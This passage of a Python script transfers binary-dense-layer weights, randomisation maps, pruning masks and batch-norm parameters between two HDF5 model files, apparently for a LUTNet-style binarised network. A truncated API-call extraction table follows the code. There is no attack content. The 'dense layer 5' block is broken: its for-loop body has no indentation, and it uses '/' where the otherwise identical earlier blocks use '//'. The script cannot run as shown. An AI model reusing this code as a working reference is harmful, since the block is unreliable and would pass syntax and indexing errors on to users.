rand_map_2 = np.arange(tile_shape[0])
np.random.shuffle(rand_map_2)
pruning_mask = np.array(bl_pruning_mask).astype(bool)
init_mask = np.logical_not(pruning_mask[rand_map_0])
pruning_mask_recover = np.logical_and(pruning_mask, init_mask)[np.argsort(rand_map_0)]
pruning_mask = np.logical_or(pruning_mask, pruning_mask_recover)
init_mask = np.reshape(init_mask, tile_shape)
# expand randomisation map across tiles
rand_map_0_expand = np.tile(rand_map_0,[weight_shape[0]//tile_shape[0]])
rand_map_1_expand = np.tile(rand_map_1,[weight_shape[0]//tile_shape[0]])
rand_map_2_expand = np.tile(rand_map_2,[weight_shape[0]//tile_shape[0]])
for i in range(weight_shape[0]):
    rand_map_0_expand[i] = rand_map_0_expand[i] + (tile_shape[0]*(weight_shape[0]//tile_shape[0]-1)) * (rand_map_0_expand[i]//tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]//tile_shape[0])
    rand_map_1_expand[i] = rand_map_1_expand[i] + (tile_shape[0]*(weight_shape[0]//tile_shape[0]-1)) * (rand_map_1_expand[i]//tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]//tile_shape[0])
    rand_map_2_expand[i] = rand_map_2_expand[i] + (tile_shape[0]*(weight_shape[0]//tile_shape[0]-1)) * (rand_map_2_expand[i]//tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]//tile_shape[0])
bl_w1_rand_0 = bl_w1_unroll[rand_map_0_expand]
bl_w1_rand_0 = np.reshape(bl_w1_rand_0, weight_shape)
w1 = bl_w1
# connect1 only
c1 = one_fill
c2 = neg_one_fill
c3 = one_fill
c4 = neg_one_fill
c5 = one_fill
c6 = neg_one_fill
c7 = one_fill
c8 = neg_one_fill
c9 = one_fill
c10 = neg_one_fill
c11 = one_fill
c12 = neg_one_fill
c13 = one_fill
c14 = neg_one_fill
c15 = one_fill
c16 = neg_one_fill
c17 = neg_one_fill
c18 = one_fill
c19 = neg_one_fill
c20 = one_fill
c21 = neg_one_fill
c22 = one_fill
c23 = neg_one_fill
c24 = one_fill
c25 = neg_one_fill
c26 = one_fill
c27 = neg_one_fill
c28 = one_fill
c29 = neg_one_fill
c30 = one_fill
c31 = neg_one_fill
c32 = one_fill
pret_w1 [...] = w1
pret_c1 [...] = c1
pret_c2 [...] = c2
pret_c3 [...] = c3
pret_c4 [...] = c4
pret_c5 [...] = c5
pret_c6 [...] = c6
pret_c7 [...] = c7
pret_c8 [...] = c8
pret_c9 [...] = c9
pret_c10[...] = c10
pret_c11[...] = c11
pret_c12[...] = c12
pret_c13[...] = c13
pret_c14[...] = c14
pret_c15[...] = c15
pret_c16[...] = c16
pret_c17[...] = c17
pret_c18[...] = c18
pret_c19[...] = c19
pret_c20[...] = c20
pret_c21[...] = c21
pret_c22[...] = c22
pret_c23[...] = c23
pret_c24[...] = c24
pret_c25[...] = c25
pret_c26[...] = c26
pret_c27[...] = c27
pret_c28[...] = c28
pret_c29[...] = c29
pret_c30[...] = c30
pret_c31[...] = c31
pret_c32[...] = c32
pret_rand_map_0[...] = np.reshape(rand_map_0, (-1,1)).astype(float)
pret_rand_map_1[...] = np.reshape(rand_map_1, (-1,1)).astype(float)
pret_rand_map_2[...] = np.reshape(rand_map_2, (-1,1)).astype(float)
p_gamma[...] = np.array(bl_gamma)
pret_means[...] = np.array(bl_means)
pret_pruning_mask[...] = np.array(bl_pruning_mask)
rand_map_0_expand = np.reshape(rand_map_0_expand, [-1,1]).astype(float)
pret_rand_map_exp_0[...] = rand_map_0_expand
rand_map_1_expand = np.reshape(rand_map_1_expand, [-1,1]).astype(float)
pret_rand_map_exp_1[...] = rand_map_1_expand
rand_map_2_expand = np.reshape(rand_map_2_expand, [-1,1]).astype(float)
pret_rand_map_exp_2[...] = rand_map_2_expand
print(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask))))
# dense layer 4
bl_w1 = bl["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_1:0"]
bl_rand_map_0 = bl["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_0:0"]
bl_pruning_mask = bl["model_weights"]["binary_dense_4"]["binary_dense_4"]["pruning_mask:0"]
bl_gamma = bl["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable:0"]
bl_means = bl["model_weights"]["residual_sign_3"]["residual_sign_3"]["means:0"]
pret_rand_map_0 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_0:0"]
pret_rand_map_1 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_1:0"]
pret_rand_map_2 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_2:0"]
pret_pruning_mask = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["pruning_mask:0"]
p_gamma = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable:0"]
pret_means = pretrained["model_weights"]["residual_sign_3"]["residual_sign_3"]["means:0"]
pret_c1 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_1:0"]
pret_c2 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_2:0"]
pret_c3 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_3:0"]
pret_c4 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_4:0"]
pret_c5 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_5:0"]
pret_c6 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_6:0"]
pret_c7 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_7:0"]
pret_c8 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_8:0"]
pret_c9 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_9:0"]
pret_c10= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_10:0"]
pret_c11= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_11:0"]
pret_c12= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_12:0"]
pret_c13= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_13:0"]
pret_c14= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_14:0"]
pret_c15= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_15:0"]
pret_c16= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_16:0"]
pret_c17= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_17:0"]
pret_c18= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_18:0"]
pret_c19= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_19:0"]
pret_c20= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_20:0"]
pret_c21= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_21:0"]
pret_c22= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_22:0"]
pret_c23= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_23:0"]
pret_c24= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_24:0"]
pret_c25= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_25:0"]
pret_c26= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_26:0"]
pret_c27= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_27:0"]
pret_c28= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_28:0"]
pret_c29= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_29:0"]
pret_c30= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_30:0"]
pret_c31= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_31:0"]
pret_c32= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_32:0"]
pret_w1 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_33:0"]
pret_rand_map_exp_0 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_exp_0:0"]
pret_rand_map_exp_1 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_exp_1:0"]
pret_rand_map_exp_2 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_exp_2:0"]
weight_shape = np.shape(bl_w1)
tile_shape = np.shape(pret_c1)
zero_fill = np.zeros(tile_shape)
one_fill = np.ones(tile_shape)
neg_one_fill = -np.ones(tile_shape)
# randomisation and pruning recovery
bl_w1_unroll = np.array(bl_w1)
bl_w1 = np.array(bl_w1)
rand_map_0 = np.arange(tile_shape[0])
np.random.shuffle(rand_map_0)
rand_map_1 = np.arange(tile_shape[0])
np.random.shuffle(rand_map_1)
rand_map_2 = np.arange(tile_shape[0])
np.random.shuffle(rand_map_2)
pruning_mask = np.array(bl_pruning_mask).astype(bool)
init_mask = np.logical_not(pruning_mask[rand_map_0])
pruning_mask_recover = np.logical_and(pruning_mask, init_mask)[np.argsort(rand_map_0)]
pruning_mask = np.logical_or(pruning_mask, pruning_mask_recover)
init_mask = np.reshape(init_mask, tile_shape)
# expand randomisation map across tiles
rand_map_0_expand = np.tile(rand_map_0,[weight_shape[0]//tile_shape[0]])
rand_map_1_expand = np.tile(rand_map_1,[weight_shape[0]//tile_shape[0]])
rand_map_2_expand = np.tile(rand_map_2,[weight_shape[0]//tile_shape[0]])
for i in range(weight_shape[0]):
    rand_map_0_expand[i] = rand_map_0_expand[i] + (tile_shape[0]*(weight_shape[0]//tile_shape[0]-1)) * (rand_map_0_expand[i]//tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]//tile_shape[0])
    rand_map_1_expand[i] = rand_map_1_expand[i] + (tile_shape[0]*(weight_shape[0]//tile_shape[0]-1)) * (rand_map_1_expand[i]//tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]//tile_shape[0])
    rand_map_2_expand[i] = rand_map_2_expand[i] + (tile_shape[0]*(weight_shape[0]//tile_shape[0]-1)) * (rand_map_2_expand[i]//tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]//tile_shape[0])
bl_w1_rand_0 = bl_w1_unroll[rand_map_0_expand]
bl_w1_rand_0 = np.reshape(bl_w1_rand_0, weight_shape)
w1 = bl_w1
# connect1 only
c1 = one_fill
c2 = neg_one_fill
c3 = one_fill
c4 = neg_one_fill
c5 = one_fill
c6 = neg_one_fill
c7 = one_fill
c8 = neg_one_fill
c9 = one_fill
c10 = neg_one_fill
c11 = one_fill
c12 = neg_one_fill
c13 = one_fill
c14 = neg_one_fill
c15 = one_fill
c16 = neg_one_fill
c17 = neg_one_fill
c18 = one_fill
c19 = neg_one_fill
c20 = one_fill
c21 = neg_one_fill
c22 = one_fill
c23 = neg_one_fill
c24 = one_fill
c25 = neg_one_fill
c26 = one_fill
c27 = neg_one_fill
c28 = one_fill
c29 = neg_one_fill
c30 = one_fill
c31 = neg_one_fill
c32 = one_fill
pret_w1 [...] = w1
pret_c1 [...] = c1
pret_c2 [...] = c2
pret_c3 [...] = c3
pret_c4 [...] = c4
pret_c5 [...] = c5
pret_c6 [...] = c6
pret_c7 [...] = c7
pret_c8 [...] = c8
pret_c9 [...] = c9
pret_c10[...] = c10
pret_c11[...] = c11
pret_c12[...] = c12
pret_c13[...] = c13
pret_c14[...] = c14
pret_c15[...] = c15
pret_c16[...] = c16
pret_c17[...] = c17
pret_c18[...] = c18
pret_c19[...] = c19
pret_c20[...] = c20
pret_c21[...] = c21
pret_c22[...] = c22
pret_c23[...] = c23
pret_c24[...] = c24
pret_c25[...] = c25
pret_c26[...] = c26
pret_c27[...] = c27
pret_c28[...] = c28
pret_c29[...] = c29
pret_c30[...] = c30
pret_c31[...] = c31
pret_c32[...] = c32
pret_rand_map_0[...] = np.reshape(rand_map_0, (-1,1)).astype(float)
pret_rand_map_1[...] = np.reshape(rand_map_1, (-1,1)).astype(float)
pret_rand_map_2[...] = np.reshape(rand_map_2, (-1,1)).astype(float)
p_gamma[...] = np.array(bl_gamma)
pret_means[...] = np.array(bl_means)
pret_pruning_mask[...] = np.array(bl_pruning_mask)
rand_map_0_expand = np.reshape(rand_map_0_expand, [-1,1]).astype(float)
pret_rand_map_exp_0[...] = rand_map_0_expand
rand_map_1_expand = np.reshape(rand_map_1_expand, [-1,1]).astype(float)
pret_rand_map_exp_1[...] = rand_map_1_expand
rand_map_2_expand = np.reshape(rand_map_2_expand, [-1,1]).astype(float)
pret_rand_map_exp_2[...] = rand_map_2_expand
print(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask))))
# dense layer 5
bl_w1 = bl["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_1:0"]
bl_rand_map_0 = bl["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_0:0"]
bl_pruning_mask = bl["model_weights"]["binary_dense_5"]["binary_dense_5"]["pruning_mask:0"]
bl_gamma = bl["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable:0"]
bl_means = bl["model_weights"]["residual_sign_4"]["residual_sign_4"]["means:0"]
pret_rand_map_0 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_0:0"]
pret_rand_map_1 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_1:0"]
pret_rand_map_2 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_2:0"]
pret_pruning_mask = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["pruning_mask:0"]
p_gamma = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable:0"]
pret_means = pretrained["model_weights"]["residual_sign_4"]["residual_sign_4"]["means:0"]
pret_c1 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_1:0"]
pret_c2 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_2:0"]
pret_c3 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_3:0"]
pret_c4 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_4:0"]
pret_c5 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_5:0"]
pret_c6 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_6:0"]
pret_c7 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_7:0"]
pret_c8 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_8:0"]
pret_c9 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_9:0"]
pret_c10= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_10:0"]
pret_c11= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_11:0"]
pret_c12= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_12:0"]
pret_c13= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_13:0"]
pret_c14= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_14:0"]
pret_c15= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_15:0"]
pret_c16= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_16:0"]
pret_c17= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_17:0"]
pret_c18= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_18:0"]
pret_c19= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_19:0"]
pret_c20= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_20:0"]
pret_c21= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_21:0"]
pret_c22= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_22:0"]
pret_c23= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_23:0"]
pret_c24= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_24:0"]
pret_c25= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_25:0"]
pret_c26= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_26:0"]
pret_c27= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_27:0"]
pret_c28= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_28:0"]
pret_c29= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_29:0"]
pret_c30= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_30:0"]
pret_c31= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_31:0"]
pret_c32= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_32:0"]
pret_w1 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_33:0"]
pret_rand_map_exp_0 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_exp_0:0"]
pret_rand_map_exp_1 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_exp_1:0"]
pret_rand_map_exp_2 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_exp_2:0"]
weight_shape = np.shape(bl_w1)
tile_shape = np.shape(pret_c1)
zero_fill = np.zeros(tile_shape)
one_fill = np.ones(tile_shape)
neg_one_fill = -np.ones(tile_shape)
# randomisation and pruning recovery
bl_w1_unroll = np.array(bl_w1)
bl_w1 = np.array(bl_w1)
rand_map_0 = np.arange(tile_shape[0])
np.random.shuffle(rand_map_0)
rand_map_1 = np.arange(tile_shape[0])
np.random.shuffle(rand_map_1)
rand_map_2 = np.arange(tile_shape[0])
np.random.shuffle(rand_map_2)
pruning_mask = np.array(bl_pruning_mask).astype(bool)
init_mask = np.logical_not(pruning_mask[rand_map_0])
pruning_mask_recover = np.logical_and(pruning_mask, init_mask)[np.argsort(rand_map_0)]
pruning_mask = np.logical_or(pruning_mask, pruning_mask_recover)
init_mask = np.reshape(init_mask, tile_shape)
# expand randomisation map across tiles
rand_map_0_expand = np.tile(rand_map_0,[weight_shape[0]/tile_shape[0]])
rand_map_1_expand = np.tile(rand_map_1,[weight_shape[0]/tile_shape[0]])
rand_map_2_expand = np.tile(rand_map_2,[weight_shape[0]/tile_shape[0]])
for i in range(weight_shape[0]):
rand_map_0_expand[i] = rand_map_0_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_0_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])
rand_map_1_expand[i] = rand_map_1_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_1_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])
rand_map_2_expand[i] = rand_map_2_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_2_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])
bl_w1_rand_0 = bl_w1_unroll[rand_map_0_expand]
bl_w1_rand_0 = np.reshape(bl_w1_rand_0, weight_shape)
w1 = bl_w1
# connect1 only
c1 = one_fill
c2 = neg_one_fill
c3 = one_fill
c4 = neg_one_fill
c5 = one_fill
c6 = neg_one_fill
c7 = one_fill
c8 = neg_one_fill
c9 = one_fill
c10 = neg_one_fill
c11 = one_fill
c12 = neg_one_fill
c13 = one_fill
c14 = neg_one_fill
c15 = one_fill
c16 = neg_one_fill
c17 = neg_one_fill
c18 = one_fill
c19 = neg_one_fill
c20 = one_fill
c21 = neg_one_fill
c22 = one_fill
c23 = neg_one_fill
c24 = one_fill
c25 = neg_one_fill
c26 = one_fill
c27 = neg_one_fill
c28 = one_fill
c29 = neg_one_fill
c30 = one_fill
c31 = neg_one_fill
c32 = one_fill
pret_w1 [...] = w1
pret_c1 [...] = c1
pret_c2 [...] = c2
pret_c3 [...] = c3
pret_c4 [...] = c4
pret_c5 [...] = c5
pret_c6 [...] = c6
pret_c7 [...] = c7
pret_c8 [...] = c8
pret_c9 [...] = c9
pret_c10[...] = c10
pret_c11[...] = c11
pret_c12[...] = c12
pret_c13[...] = c13
pret_c14[...] = c14
pret_c15[...] = c15
pret_c16[...] = c16
pret_c17[...] = c17
pret_c18[...] = c18
pret_c19[...] = c19
pret_c20[...] = c20
pret_c21[...] = c21
pret_c22[...] = c22
pret_c23[...] = c23
pret_c24[...] = c24
pret_c25[...] = c25
pret_c26[...] = c26
pret_c27[...] = c27
pret_c28[...] = c28
pret_c29[...] = c29
pret_c30[...] = c30
pret_c31[...] = c31
pret_c32[...] = c32
pret_rand_map_0[...] = np.reshape(rand_map_0, (-1,1)).astype(float)
pret_rand_map_1[...] = np.reshape(rand_map_1, (-1,1)).astype(float)
pret_rand_map_2[...] = np.reshape(rand_map_2, (-1,1)).astype(float)
p_gamma[...] = np.array(bl_gamma)
pret_means[...] = np.array(bl_means)
pret_pruning_mask[...] = np.array(bl_pruning_mask)
rand_map_0_expand = np.reshape(rand_map_0_expand, [-1,1]).astype(float)
pret_rand_map_exp_0[...] = rand_map_0_expand
rand_map_1_expand = np.reshape(rand_map_1_expand, [-1,1]).astype(float)
pret_rand_map_exp_1[...] = rand_map_1_expand
rand_map_2_expand = np.reshape(rand_map_2_expand, [-1,1]).astype(float)
pret_rand_map_exp_2[...] = rand_map_2_expand
print(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask))))
# bn 1
bl_beta = bl["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["beta:0"]
bl_gamma = bl["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["gamma:0"]
bl_moving_mean = bl["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["moving_mean:0"]
bl_moving_variance = bl["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["moving_variance:0"]
p_beta = pretrained["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["beta:0"]
p_gamma = pretrained["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["gamma:0"]
p_moving_mean = pretrained["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["moving_mean:0"]
p_moving_variance = pretrained["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["moving_variance:0"]
p_beta[...] = np.array(bl_beta)
p_gamma[...] = np.array(bl_gamma)
p_moving_mean[...] = np.array(bl_moving_mean)
p_moving_variance[...] = np.array(bl_moving_variance)
# bn 2
bl_beta = bl["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["beta:0"]
bl_gamma = bl["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["gamma:0"]
bl_moving_mean = bl["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["moving_mean:0"]
bl_moving_variance = bl["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["moving_variance:0"]
p_beta = pretrained["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["beta:0"]
p_gamma = pretrained["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["gamma:0"]
p_moving_mean = pretrained["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["moving_mean:0"]
p_moving_variance = pretrained["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["moving_variance:0"]
p_beta[...] = np.array(bl_beta)
p_gamma[...] = np.array(bl_gamma)
p_moving_mean[...] = np.array(bl_moving_mean)
p_moving_variance[...] = np.array(bl_moving_variance)
# bn 3
bl_beta = bl["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["beta:0"]
bl_gamma = bl["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["gamma:0"]
bl_moving_mean = bl["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["moving_mean:0"]
bl_moving_variance = bl["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["moving_variance:0"]
p_beta = pretrained["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["beta:0"]
p_gamma = pretrained["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["gamma:0"]
p_moving_mean = pretrained["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["moving_mean:0"]
p_moving_variance = pretrained["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["moving_variance:0"]
p_beta[...] = np.array(bl_beta)
p_gamma[...] = np.array(bl_gamma)
p_moving_mean[...] = np.array(bl_moving_mean)
p_moving_variance[...] = np.array(bl_moving_variance)
# bn 4
bl_beta = bl["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["beta:0"]
bl_gamma = bl["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["gamma:0"]
bl_moving_mean = bl["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["moving_mean:0"]
bl_moving_variance = bl["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["moving_variance:0"]
p_beta = pretrained["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["beta:0"]
p_gamma = pretrained["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["gamma:0"]
p_moving_mean = pretrained["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["moving_mean:0"]
p_moving_variance = pretrained["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["moving_variance:0"]
p_beta[...] = np.array(bl_beta)
p_gamma[...] = np.array(bl_gamma)
p_moving_mean[...] = np.array(bl_moving_mean)
p_moving_variance[...] = np.array(bl_moving_variance)
# bn 5
bl_beta = bl["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["beta:0"]
bl_gamma = bl["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["gamma:0"]
bl_moving_mean = bl["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["moving_mean:0"]
bl_moving_variance = bl["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["moving_variance:0"]
p_beta = pretrained["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["beta:0"]
p_gamma = pretrained["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["gamma:0"]
p_moving_mean = pretrained["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["moving_mean:0"]
p_moving_variance = pretrained["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["moving_variance:0"]
p_beta[...] = np.array(bl_beta)
p_gamma[...] = np.array(bl_gamma)
p_moving_mean[...] = np.array(bl_moving_mean)
p_moving_variance[...] = np.array(bl_moving_variance)
pretrained.close()
| [
"numpy.tile",
"numpy.random.shuffle",
"numpy.reshape",
"numpy.ones",
"numpy.logical_and",
"numpy.logical_not",
"numpy.logical_or",
"h5py.File",
"numpy.argsort",
"numpy.array",
"shutil.copyfile",
"numpy.zeros",
"numpy.shape",
"numpy.arange",
"numpy.set_printoptions"
] | [((31, 68), 'numpy.set_printoptions', 'np.set_printoptions', ([], {'threshold': 'np.nan'}), '(threshold=np.nan)\n', (50, 68), True, 'import numpy as np\n'), ((99, 147), 'shutil.copyfile', 'copyfile', (['"""dummy_lutnet.h5"""', '"""pretrained_bin.h5"""'], {}), "('dummy_lutnet.h5', 'pretrained_bin.h5')\n", (107, 147), False, 'from shutil import copyfile\n'), ((211, 247), 'h5py.File', 'h5py.File', (['"""baseline_pruned.h5"""', '"""r"""'], {}), "('baseline_pruned.h5', 'r')\n", (220, 247), False, 'import h5py\n'), ((297, 333), 'h5py.File', 'h5py.File', (['"""pretrained_bin.h5"""', '"""r+"""'], {}), "('pretrained_bin.h5', 'r+')\n", (306, 333), False, 'import h5py\n'), ((949, 964), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (957, 964), True, 'import numpy as np\n'), ((980, 998), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (988, 998), True, 'import numpy as np\n'), ((1024, 1049), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (1032, 1049), True, 'import numpy as np\n'), ((5514, 5529), 'numpy.shape', 'np.shape', (['bl_w1'], {}), '(bl_w1)\n', (5522, 5529), True, 'import numpy as np\n'), ((5543, 5560), 'numpy.shape', 'np.shape', (['pret_c1'], {}), '(pret_c1)\n', (5551, 5560), True, 'import numpy as np\n'), ((5573, 5593), 'numpy.zeros', 'np.zeros', (['tile_shape'], {}), '(tile_shape)\n', (5581, 5593), True, 'import numpy as np\n'), ((5605, 5624), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\n', (5612, 5624), True, 'import numpy as np\n'), ((5714, 5729), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (5722, 5729), True, 'import numpy as np\n'), ((5738, 5753), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (5746, 5753), True, 'import numpy as np\n'), ((5768, 5792), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (5777, 5792), True, 'import numpy as np\n'), ((5793, 5822), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_0'], {}), '(rand_map_0)\n', (5810, 5822), True, 'import numpy as np\n'), ((5836, 5860), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (5845, 5860), True, 'import numpy as np\n'), ((5861, 5890), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_1'], {}), '(rand_map_1)\n', (5878, 5890), True, 'import numpy as np\n'), ((5904, 5928), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (5913, 5928), True, 'import numpy as np\n'), ((5929, 5958), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_2'], {}), '(rand_map_2)\n', (5946, 5958), True, 'import numpy as np\n'), 